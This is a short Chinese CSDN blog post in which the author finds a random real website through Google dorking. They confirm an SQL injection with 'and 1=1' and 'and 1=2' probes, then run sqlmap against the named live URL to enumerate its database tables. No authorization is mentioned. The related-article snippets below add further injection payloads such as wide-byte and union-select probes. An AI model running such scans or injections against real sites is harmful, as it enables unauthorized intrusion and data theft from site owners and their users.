记一次SQL注入

最新推荐文章于 2024-06-11 18:30:00 发布
最新推荐文章于 2024-06-11 18:30:00 发布
阅读量153 收藏
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70770389/article/details/136998717
版权

这里先google hacking随便找一个,反复实验试一下

这里用这个示例,先按流程进行排查

Id=22 and 1=1有回显

Id=22 and 1=2无回显

判断有sql注入

这里用的sqlmap进行爆破

# sqlmap -u "http://www.chinahongs.com/gyhy.asp?id=22" --batch

发现是布尔盲注型漏洞

后面直接使用sqlmap指令进行爆破

sqlmap -u "http://www.chinahongs.com/gyhy.asp?id=22" --batch --tables

  

再查表查字段获取更多信息便不演示啦

Little.80
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一次成功的sql注入入侵检测附带sql性能优化
09-11
很多同学和园友都遇到过sql注入的,其中大部分都是代码的不严谨造成的,都是犯过很多错误才学会认真起来
一次简单的SQL注入
he320631127的博客
08-06 561
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
漏洞挖掘 | 一次伪静态页面的SQL注入
最新发布
2301_80127209的博客
06-11 457
在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload多尝试,多总结祝各位师兄们也都收获满满~~!申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
一次简单的sql注入
weixin_30550081的博客
02-09 102
什么是sql注入攻击? 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。 1.判断注入点是否有效 sqlmap -u "http://xxx.xxx....
一次对某网站的sql注入
weixin_67503304的博客
09-16 3624
讲解了一次基本sql注入的实战讲解,针对某省某网站的实战测试,本测试仅用于演示。
一次手动SQL注入
weixin_33874713的博客
03-23 163
1、检测到可能存在注入漏洞的url 最常用的 ‘ ,and 1=1 ,and 1=2 http://www.xxx.com/subcat.php?id=1 2、判断字段个数 http://www.xxx.com/subcat.php?id=1 order by 1 发现只有一个字段 3、查看数据库名 http://www.xxx.com/subcat.php?id=1 union select d...
实例讲解SQL注入攻击
02-26
SQL注入”是一种利用未过滤/未审核用户输入的攻击方法(“缓存溢出”和这个不同),意思就是让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。本...
浅谈一次sql注入 & webshell 的美丽“邂逅”
09-09
SQL注入是一种常见的网络安全漏洞,发生在应用程序未能充分验证或清理用户输入的数据时。当攻击者能够将恶意的SQL代码注入到查询中,他们可以获取敏感信息、修改数据库内容甚至完全控制数据库服务器。在上述案例中,...
使用Python防止SQL注入攻击的实现示例
09-16
开放式Web应用程序安全项目(OWASP)每几年都会发布一次关于Web应用程序最常见安全风险的报告,其中SQL注入攻击一直位居前列。SQL注入不仅常见,而且危害巨大,能够导致数据泄露、破坏或被篡改等严重后果。鉴于...
一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1290
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
一次sql注入实践
程序男的专栏
03-01 523
今天开发代码的时候发现自己的sql全是拼接的,不是where a = ?的那种,细思恐极啊,于是进行了一场sql注入实践。虽然失败了,但是还是得出了一些宝贵的经验。 首先从一个基础的分页查询语句开始分析: Select r.a,r.b  from role r where r.name like ‘role%’  order by r.create_time desc liimit 0,10;说明...
一次lmxcms审计sql注入到rce审计全过程
weixin_64683116的博客
02-12 1045
欢迎各位师傅关注我的个人公众号: Gat4by前言:马上过年了就要忙起来了,后面大年初一初二可能没时间玩电脑了,趁着这几天手感火热,审一审比较著名的梦想cms。项目源码: http://www.lmxcms.com/down/安装好了这个cms后台进去长这样,看着这界面写的挺糙的,一眼满是漏洞的感觉,今天来审计练习一下RCE漏洞。我审计PHP的CMS的RCE的思路就是先去找是否有eval()函数的存在,先来一手全局查找eval()函数,接着我们锁定eval()函数中是变量而不是预定义常量的。于是来到一处ev
一次SRC实战-SQL注入
YINGXXX123的博客
01-28 756
前端输入字段,后端会运行SQL语句返回数据。数据库大都是支持SQL语言的,SQL语言本身是有预留关键字的,比如常用的select、update、delete等。故意输入非正常的SQL查询语句,由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,没有执行相关验证,用户可以提交一段非法的数据库查询语句,根据程序返回的结果,获得某些他想得知的数据,轻者程序错误,代码泄露,重者直接暴库,甚至危及服务器整体安全,这就是SQL注入攻击。
一次sql注入实战
qq_43710889的博客
07-12 450
录一下第一次拿站 偶然的时间,偶然的网址我看到了偶然的一次sql注入,苦苦寻找的小网站在那一瞬间被找到,一个字爽。但是拿站的过程是曲折的。 首次看到这个后台管理页面,没有验证码,所以尝试sql注入。简单试了试,决定查看是否存在POST注入。 首先使用代理Brupsuite进行抓包,抓取请求包。 将请求包中的内容,粘贴到文本中。 之后使用sqlmap进行注入 python sqlmap.py -r "test.txt" 然后查看当前所在的数据库,查看当前用户 python sqlmap.py -r
干货!一次伪静态页面的SQL注入!白帽黑客实战 。
m0_60571990的博客
11-22 778
干货!一次伪静态页面的SQL注入!白帽黑客实战 。
一次入门难度的SQL注入与密码破解
ZL_1618的博客
01-02 969
技术流程没什么可总结,该写的都在上面,我们来谈几点安全行业的问题首先,不要信任用户的输入,用户的输入有时候,可能会对系统造成危害,就像我们的注入语句。很多时候,我们会通过禁止输入诸如空格,分号,引号之类的字符来实施管控,但对应的也有屏蔽这些管控机制的方法,这样来回的防御与攻击就是SQL安全领域所研究的课题其次,用户的安全意识。
一次SQL注入漏洞学习
weixin_48017707的博客
09-23 278
文章目录前言一、SQL注入是什么?二、数据库1.数据库相关表2.数据库的操作三、SQL注入分类1、依据注入点类型分类:2、搜索型注入3、依据获取信息的方式分类:四、判断是否存在SQL注入1、手工查询1.1、在URL后面添加 and 1 = 1、and 1 = 2查看页面是否一样,如果不一样则存在SQL注入漏洞1.2先加单引号 '、双引号 "、单括号 )、双括号 ))等看看是否报错,如果报错就可能存在SQL注入漏洞了。2、工具查询五、SQL注入测式(Boolean盲注)1、数据库类型判断2、判断当前数据库名3
渗透测试|一次SQL注入新用法
weixin_45840241的博客
06-01 751
在参加某市攻防演练的时候,发现目标站,经过一系列尝试,包括弱口令、SQL注入等等尝试后,未获得到有效的入口点。在准备放弃之时,看到页脚的banner:xxxxx信息科技有限公司然后有了个想法,到fofa里面搜这个banner,找到一些其他使用该站的,但是没有参与攻防演练的(PS:演练前该单位做过整改弱口令全改了)。
mysql insert sql注入_SQL注入-双注入的学习
weixin_42128270的博客
02-07 487
0x1 需要用到的MySQL函数count():用来统计表中或数组中录的一个函数 count(*)某表中所有的列floor():返回小于等于该值的最大整数【向下取整】rand(): 产生随机数0x2原理分析接下来我们再分析其报错的形成 原因:先谈group by 函数:在表中再插入两条数据,name值都为“bbb”:mysql> INSERT INTO test VALUES("3","b...
SQL注入详解:执行系统命令与渗透测试
二阶注入是指攻击者通过一次注入攻击在数据库中留下恶意数据,然后在后续的查询中触发这些数据,造成第二次的注入攻击。 总结 SQL注入是Web应用程序安全的重要问题,需要开发者在设计和实现时采取预防措施,如参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值